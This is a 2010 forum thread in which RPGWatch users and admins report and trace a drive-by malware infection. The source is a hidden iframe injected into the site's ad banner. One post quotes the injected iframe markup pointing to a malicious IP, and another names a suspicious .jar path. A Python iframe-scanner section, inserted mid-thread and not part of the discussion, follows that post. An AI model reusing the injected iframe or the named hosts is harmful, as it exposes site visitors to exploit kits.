RPGWatch Forums

RPGWatch Forums (http://www.rpgwatch.com/forums/index.php)
-   RPGWatch (http://www.rpgwatch.com/forums/forumdisplay.php?f=2)
-   -   Virus on the main page? (http://www.rpgwatch.com/forums/showthread.php?t=10935)

DPB July 10th, 2010 15:36

Virus on the main page?
 
The forums don't seem to be affected, but when I try to access the main page avast gives me an 'A Virus Was Found!' warning and obviously I click abort connection to prevent it loading. Is this just a false positive?

The warning shows:

Filename: http://www.rpgwatch.com/\{gzip}
Malware name: HTML:Iframe-inf
Malware type: Virus/Worm
VPS version: 100710-1, 10/07/2010

GothicGothicness July 10th, 2010 16:10

I also get this warning but it appears to come from another place:

194.8.250.211/tds/in.cgi?default

194.8.250.211 site info:
IP: 194.8.250.211
Server location: Paraguay
ISP: Donstroy Ltd.

Looks kind of fishy ?

deimos July 10th, 2010 16:31

I got a prompt to install some plugin to view additional content. Adblock sees it as a frame; I got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

Cm July 10th, 2010 16:34

I certainly can't swear that it is a false positive, but I have been here from day one and never heard of any virus issues on the site. I have seen people say they got false positives over the years.
I know management will respond when they see your question. It's the middle of the night for him, so check back in about 6 to 8 hours.

July 10th, 2010 16:37

Could be a false positive, but just recently there were similar issues on the Titan Quest forums; somebody/something had injected the main page code with links to plugins or some other type of infected content. I'm not familiar with the technical details, but it wasn't the site owner's doing in any case.

Kostas July 10th, 2010 16:43

Windows Defender found something; it definitely has to do something with Java.

hishadow July 10th, 2010 17:10

There's an iframe in the banner.

It's the ads delivery that contains the virus.
http://www.rpgwatch.com/Scripts/open…s.php?zoneid=1

Quote:

<div class="header">
<a href="/" style="float:left; outline:none; background:none"><img src="/Skins/Default/Images/invis.png" width="170" height="100" /></a>
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?oaparams=2__bannerid=2__zoneid=1__cb=34dcb7bbc7__oadest=http%3A%2F%2Fwww.gog.com%2Fen%2Ffrontpage%2Fpp%2Ff6e1126cedebf23e1463aee73f9df08783640400' target='_blank'><img src='http://www.rpgwatch.com/Scripts/openx/www/images/4d2ed333f245d7c9b96d1d8aee3627a8.jpg' width='468' height='60' alt='Register at GOG through us' title='Register at GOG through us' border='0' /></a>
<div id='beacon_34dcb7bbc7' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www.rpgwatch.com/Scripts/openx/www/delivery/lg.php?bannerid=2&amp;campaignid=1&amp;zoneid=1&amp;loc=http%3A%2F%2Fwww.rpgwatch.com%2F&amp;referer=http%3A%2F%2Fwww.rpgwatch.com%2Fforums%2Fshowthread.php%3Fp%3D1061017633&amp;cb=34dcb7bbc7' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
<iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</div>
</div>
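The snippet above is the classic shape of an injected ad-delivery iframe: a 1x1 frame, off-site, pointing at a bare IP rather than a hostname. As an added example (not code from the thread or from RPGWatch), here is a small Python scanner a site admin could run over their own served HTML to flag iframes with those traits. The sample page is constructed to resemble the quoted banner markup; the site hostname is an assumption.

```python
"""Flag suspicious iframes in served HTML (added example, constructed input).

An iframe is reported when it (a) points at a host other than the site's own,
(b) uses a bare IP address as its host, (c) is sized to be invisible
(width or height <= 1), or (d) is hidden through inline style.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.rpgwatch.com"  # assumption: the host the page legitimately belongs to

# Constructed sample: a banner wrapper with one injected 1x1 iframe and one
# legitimate same-site iframe, so the scanner has both kinds to judge.
SAMPLE_HTML = """
<div class="banner-top">
<a href='http://www.rpgwatch.com/Scripts/openx/www/delivery/ck.php?bannerid=2' target='_blank'>
<img src='http://www.rpgwatch.com/Scripts/openx/www/images/banner.jpg' width='468' height='60' /></a>
<iframe src="http://194.8.250.211/tds/in.cgi?default" width="1" height="1" frameborder="0" scrolling="no"></iframe>
<iframe src="/widgets/poll.php" width="300" height="250"></iframe>
</div>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser lowercases attribute names; values may be None
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_ip_host(host):
    """True if the host part of a URL is a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _dimension(value):
    """Parse a width/height attribute such as '1', '1px' or '300'; None if no digits."""
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None


def find_suspicious_iframes(html, site_host=SITE_HOST):
    """Return a list of (src, reasons) for every iframe that looks injected."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""  # relative src -> no host
        reasons = []
        if host and host != site_host:
            reasons.append("third-party src")
        if host and _is_ip_host(host):
            reasons.append("bare IP host")
        width = _dimension(attrs.get("width", ""))
        height = _dimension(attrs.get("height", ""))
        if (width is not None and width <= 1) or (height is not None and height <= 1):
            reasons.append("invisible size")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_HTML):
        print(f"{src}: {', '.join(reasons)}")
```

Run against the constructed sample it reports only the IP-hosted 1x1 frame; the same-site poll frame passes. Fetching the live page with a fresh, cookie-less client and feeding it to this function on a schedule is a cheap way to notice this kind of injection before visitors' antivirus does.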

Remus July 10th, 2010 17:22

Quote:

Originally Posted by deimos (Post 1061017629)
I got a prompt to install some plugin to view additional content. Adblock sees it as a frame; I got alerted by my firewall first for Java attempting a connection. I blocked it and didn't get infected with anything, it seems.

Also blocked the frame with Adblock and it's quiet now.

I saw the prompt to install a missing plug-in as well. I didn't click it but closed it; Microsoft Security Essentials didn't alert me of a possible virus.

figment July 10th, 2010 18:29

Got the same problem. The owner of the site is Donstroy, which apparently owns several .RU websites, which makes me concerned. I tried to manually download the \\194.8.250.216\public\veyron.jar file it was trying to access out of curiosity but cannot seem to, which is probably for the best. Could be an ad for the Bugatti Veyron but I really doubt it.

I suspect they are trying to exploit a security vulnerability in some versions of the Java Deployment Toolkit. So I would recommend updating or disabling that add-in in whatever browser you use.

Edit: Link to all the nasty stuff detected from that domain

cal1s July 10th, 2010 18:59

I tried to email the webmaster of rpgwatch but had no success. info@rpgwatch.com and webmaster@rpgwatch.com didn't work.

You should consider setting up those email accounts for such cases.

but glad others have reported …

aries100 July 10th, 2010 20:15

I got the 'reported as unsafe website' when I clicked the mentioned link. I promptly then closed internet explorer. I hope I haven't gotten anything nasty, though…

Arhu July 11th, 2010 10:09

Myrthos is still asleep I guess, and I'm unfortunately not at home at the moment. I'll check what I can when I'm back.

metamorphium July 11th, 2010 12:46

It's definitely fishy. My ESET NOD32 identified it as the Java/Exploit.Agent.NAC Trojan horse coming from http://woonv[dot]in

Alrik Fassbauer July 11th, 2010 13:25

Firefox 2.x says it wants another plugin to be installed - and that is an "Adobe Reader Plugin" it wants.

This is - by the way - a quite new kind of "drive-by infection" that has become increasingly and alarmingly common.

I think you might switch off the ads altogether and then look what's happening.

I have seen exactly the same advertisement banner both on a game-related web site and on a Poboards-based forum a few months ago, and BOTH triggered the same NOD32 alarm …

So I'm sure this new kind of infection hides within advertisement banners.

Gokyabgu July 11th, 2010 15:56

I've got the same problem five hours ago. My Nod32 antivirus program gave me a virus threat error. It seems to be fine now.

Arhu July 11th, 2010 18:13

I disabled the ads until Myrthos can figure out where, why and how this happened. Thanks for the reports everyone and sorry for the delay. Can't offer any further info yet.

aries100 July 11th, 2010 19:33

Thank you, Arhu, for disabling the ads. I did apparently catch something. However, after a few restarts and a return to the default settings for Internet Explorer, as well as removing all passwords etc., it seems fine now.

Incidentally, Gameboomers and the Mystery Manor Site have also been the target for attacks by hackers, it seems.

Kostas July 11th, 2010 21:21

Both Firefox and Chrome now block the site; hope Myrthos can sort it out quickly.

metamorphium July 11th, 2010 22:27

Also don't forget to submit the site for re-evaluation. Merely removing the malicious code is not enough.

Myrthos July 12th, 2010 00:26

Apparently our ads software was hacked. There are some messages on the net that even the latest version of our ads software might not be safe, so for the time being we'll just have to live without ads until all the issues are fixed.

In the meantime I've requested to be removed from the malware list, which is helpful for those using Firefox or Chrome.

Sorry about this.
